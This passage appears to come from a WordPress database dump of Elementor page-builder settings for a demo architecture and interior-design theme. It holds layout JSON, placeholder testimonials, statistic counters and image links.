1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3129,4755,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3130,4755,'_elementor_pro_version','3.8.1'),(3131,4755,'_elementor_css','a:6:{s:4:\"time\";i:1685009889;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3132,4756,'_wp_page_template','elementor_header_footer'),(3133,4756,'_elementor_edit_mode','builder'),(3134,4756,'_elementor_template_type','wp-page'),(3135,4756,'_elementor_version','3.8.1'),(3136,4756,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable 